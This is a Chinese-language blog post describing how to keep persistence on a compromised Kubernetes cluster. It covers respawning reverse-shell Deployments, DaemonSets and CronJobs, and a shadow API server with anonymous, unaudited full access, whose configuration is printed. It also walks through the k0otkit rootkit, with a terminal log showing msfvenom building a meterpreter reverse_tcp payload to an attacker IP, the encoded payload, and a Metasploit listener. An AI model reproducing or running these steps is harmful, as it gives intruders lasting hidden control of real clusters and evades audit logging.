Kubernetes权限维持


前言

通过各种方法获得Kubernetes集群中的mastes或者node如何进行权限维持,从而进步渗透利用?比如像linux、windows那样进行?

此处以四种方法展开

控制器利用

创建容器时, 通过启用DaemonSet、Deployment,可以使容器和子容器即使被删除了也能够进步恢复重启,以实现权限维持的效果

涉及相关概念:
ReplicationController(RC):确保在任何时候都有特定数量的Pod处于运行状态

Replication Set(RS):此处推荐使用RS和Deployment代替RC,实际上RS和RC的功能基本一致,目前唯一的一个区别就是RC只支持基于等式的selector

Deployment:实现出来的效果和职责同RC一样,可以理解为RC的升级版本

Deployment

编写反弹shell的yaml文件即可

node1、node2都将反弹shell如下

期间对创建出来的pod进行删除后,deployment将自动创建恢复pod,以再次实现反弹shell权限维持

DaemonSet

同理操作即可,轮流弹shell效果相同

img

shadowapiserver利用

此处自行部署的shadowapiserver该apiserver同集群内现有的apiserver具备相同功能,同时进步开启了k8s的权限,接收匿名请求且不保存日志,进步使得攻击者能够无痕迹的管理整个集群

查看当前的api-server信息如下

寻找脆弱点,确认如下

直接部署shadowapiserver,效果如下

2022/03/31 06:20:04 shadow api-server deploy success!
        shadow api-server pod name:kube-apiserver-master-shadow, namespace:kube-system, node name:master
        listening insecure-port: 0.0.0.0:9443
        listening secure-port: 0.0.0.0:9444     enabled all privilege for system:anonymous user
        go further run `cdk kcurl anonymous get http://your-node-intranet-ip:9443/api` to takeover cluster with none audit logs!

在看眼部署出来的shadow,确认部署成功后的shadowapiserver

相关实现功能配置信息如下
kube-apiserver
      --advertise-address=192.168.3.19
      --allow-privileged=true
      --authorization-mode=AlwaysAllow
      --client-ca-file=/etc/kubernetes/pki/ca.crt
      --enable-admission-plugins=NodeRestriction
      --enable-bootstrap-token-auth=true
      --etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt
      --etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt
      --insecure-bind-address=0.0.0.0
      --anonymous-auth=true
      --etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key
      --etcd-servers=https://127.0.0.1:2379
      --insecure-port=9443
      --kubelet-client-certificate=/etc/kubernetes/pki/apiserver-kubelet-client.crt
      --kubelet-client-key=/etc/kubernetes/pki/apiserver-kubelet-client.key
      --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
      --proxy-client-cert-file=/etc/kubernetes/pki/front-proxy-client.crt
      --proxy-client-key-file=/etc/kubernetes/pki/front-proxy-client.key
      --requestheader-allowed-names=front-proxy-client
      --requestheader-client-ca-file=/etc/kubernetes/pki/front-proxy-ca.crt
      --requestheader-extra-headers-prefix=X-Remote-Extra-
      --requestheader-group-headers=X-Remote-Group
      --requestheader-username-headers=X-Remote-User
      --secure-port=9444
      --service-account-key-file=/etc/kubernetes/pki/sa.pub
      --service-cluster-ip-range=10.1.0.0/16
      --tls-cert-file=/etc/kubernetes/pki/apiserver.crt
      --tls-private-key-file=/etc/kubernetes/pki/apiserver.key

此处部署成功后,后续我们都可以用这个新的api进行操作

直接获取各类token信息

同理kubectl也不需要认证

cronjob

用于执行周期性的动作,通过yaml部署以实现周期性的反弹shell,创建计划任务的yaml

创建成功效果&yaml中反弹shell信息如下

K0otkit

技术细节查看:https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw
项目下载:https://github.com/Metarget/k0otkit

下载并赋予项目文件权限,修改ip&端口

生成kootkit,并进步执行反弹shell监听

┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]
└─# ./pre_exp.sh             
+ ATTACKER_IP=192.168.3.11
+ ATTACKER_PORT=20227
+ TEMP_MRT=mrt
+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=20227 LHOST=192.168.3.11 -f elf -o mrt
++ base64 -w 0
++ tr -d '\n'
++ xxd -p mrt
+ PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_template.sh
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_remote_template.sh
                                                                                                                                                                                              
┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]
└─# ./handle_multi_reverse_shell.sh 
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444 
msf6 exploit(multi/handler) > 

上传并执行在攻击机生成的k0otkit.sh文件

执行后效果如下,会在kube-system下的kube-proxy进行修改

上线效果如下


Author: Yangsir
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source Yangsir !
  TOC